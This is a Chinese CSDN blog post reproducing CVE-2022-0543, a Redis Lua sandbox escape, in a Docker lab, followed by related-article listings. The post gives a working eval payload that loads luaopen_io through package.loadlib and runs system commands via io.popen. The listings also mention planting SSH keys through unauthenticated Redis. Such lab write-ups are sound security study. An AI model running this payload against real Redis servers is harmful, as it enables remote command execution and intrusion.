Redis Lua沙盒绕过命令执行(CVE-2022-0543)

最新推荐文章于 2024-08-19 13:42:15 发布
最新推荐文章于 2024-08-19 13:42:15 发布
阅读量442 收藏
点赞数
分类专栏: 漏洞复现 文章标签: lua redis 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/125422496
版权

漏洞原理介绍

Redis 是一个开源(BSD 许可)的内存数据结构存储,用作数据库、缓存和消息代理。

Redis 是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。

在 Ubuntu 发行版打包中,不慎在 Lua 沙箱中重新分发一个箱对象package,攻击利用这个对象的加载动态库,可以使用package.loadlib从 liblua 加载模块,然后使用此模块执行任意命令;

参考链接:

漏洞版本

2.2 <= redis < 5.0.13

2.2 <= redis < 6.0.15

2.2 <= redis < 6.2.5

漏洞环境

执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器

docker-compose  up -d

服务启动后,我们就可以使用redis-cli -h your-ip连接这个redis服务器了。

 

漏洞复现

我们借助Lua沙箱中遗留的变量`package`的`loadlib`函数来加载动态链接库`/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`里的导出函数`luaopen_io`。在Lua中执行这个导出函数,即可获得`io`库,再使用其执行命令:

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

 注意,liblua库,不同的系统liblua路径可能不一样,vulhub对应的ubantu系统的路径

利用 payload

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

命令执行成功

Sword-heart
关注
专栏目录
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
CVE-2022-0543redis沙盒逃逸)
huayimy的博客
02-03 917
CVE-2022-0543redis沙盒逃逸借助Lua沙箱中遗留的变量packageloadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
远程代码执行漏洞
kali_Ma的博客
10-30 2088
发现data.headers中出现了x-real-ip:127.0.0.1 ,这是我们调用batch-requests插件传递的头信息,而此时系统默认的X-Real-IP为大写。在请求头覆盖中、因为 real_ip_hdr 为 X-Real-IP , 函数core.request.get_remote_clinte_ip()获取远程客户端ip、不能将 x-real-ip给覆盖。通过遍历表结构、获取到 real_ip_header 的值然后再赋值给real_ip_hdr。该值为在系统启动后、给定的默认值。
Redis Lua沙盒绕过RCE(CVE-2022-0543
最新发布
qq_57163799的博客
08-19 590
覆盖面极广的Redis未授权漏洞利用方式——全版本通用!!!
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Foreverlove112的博客
09-22 570
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Redis Lua 沙盒逃逸漏洞(CVE-2022-0543
chaojixiaojingang
03-18 7755
1.漏洞描述 Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 2.漏洞原理 Redis一直有一个攻击点,就是在用户连接redis后,可以通过eval命令执行lua脚本,但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件。Ubuntu/D...
Redis未授权访问利用合集
em.....
07-07 862
微信公众号:小惜渗透,欢迎大佬一起交流进步正常redis默认情况下,会绑定在0.0.0.0:6379,如果没有限制来源IP并且甚至没有密码,那么就会导致攻击者非法访问,并读取Redis的数据,还可以利用自身config命令进行写入操作,攻击者可将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys中,进而直接使用对应私钥登录目标服务器。搭建环境: 将这行绑定本地加上注释(还可以改成0.0.0.0)将保护模式关闭保存,然后启动redis服务 切记别忘了关防火墙在/roo
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
《深入理解resty-redis-cluster:Openresty Lua中的Redis集群客户端》 在现代Web服务开发中,数据存储和缓存扮演着至关重要的角色。Redis作为一款高性能的键值存储系统,广泛应用于缓存、消息队列等领域。而...
lua-resty-redis-connector-master
04-11
在使用lua-resty-redis-connector时,开发者需要先在Lua代码中初始化连接池,然后从池中获取连接,执行相应的Redis命令。例如: ```lua local redis = require "resty.redis" local red = redis:new() red:set_time...
lua-resty-redis-connector:lua-resty-redis的连接实用程序
02-03
`lua-resty-redis-connector` 是一个针对 `lua-resty-redis` 库的扩展模块,主要用于在 OpenResty(一个基于 Nginx 的高性能 Web 平台,集成了 LuaJIT)环境中提供更高效的 Redis 连接管理。这个库帮助开发者在处理...
脚本:我开发的所有Lua脚本,包括漏洞利用脚本(请仅将其用于教育目的)
02-28
剧本 我开发的所有Lua脚本,包括漏洞利用脚本(请仅将其用于教育目的)
lua-resty-redis-util:openrestylua-resty-redis封装工具类
02-03
`lua-resty-redis-util` 是一个专门为 OpenResty(一个基于 Nginx 的高性能 Web 平台,集成了 LuaJIT)设计的 Redis 客户端库的封装工具类。这个工具类使得在 OpenResty 中使用 LuaRedis 进行交互变得更加便捷和...
redis-lua-scaling-bloom-filter:用于缩放布隆过滤器的LUA Redis脚本
02-03
redis-lua-scaling-bloom-filter add.lua , cas.lua和check.lua是用于的三个lua脚本layer-add.lua和later-check.lua是用于的两个lua脚本这些脚本将在Redis中使用命令执行。 这些脚本可能无法在Redis集群上运行,...
RedisDeskTopManager(2019-2022
05-11
用于Redis的跨平台开源数据库管理工具。 RDM是易于使用的GUI工具,可用于Windows,Linux,MacOS和iPadOS。 使用RDM分析您的Redis:registered:内存使用情况,并通过批量删除来删除过时的数据。 RDM支持所有最新的...
resp-2022.2.0.0.exe
02-25
RedisDesktopManager 2022.2.0.0
CVE-2022-0543 Redis沙盒逃逸漏洞
weixin_45715461的博客
07-01 3597
CVE-2022-0543 Redis沙盒逃逸漏洞
CVE-2022-0543Redis 沙盒逃逸漏洞)
热门推荐
Battery的博客
11-23 11万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在沙箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua沙箱中遗留的变量packageloadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行命令,也可以根据需求更换其他命令
redis lua沙盒绕过
08-14
- *1* [Redis Lua沙盒绕过命令执行CVE-2022-0543)](https://blog.csdn.net/weixin_45495060/article/details/123692356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值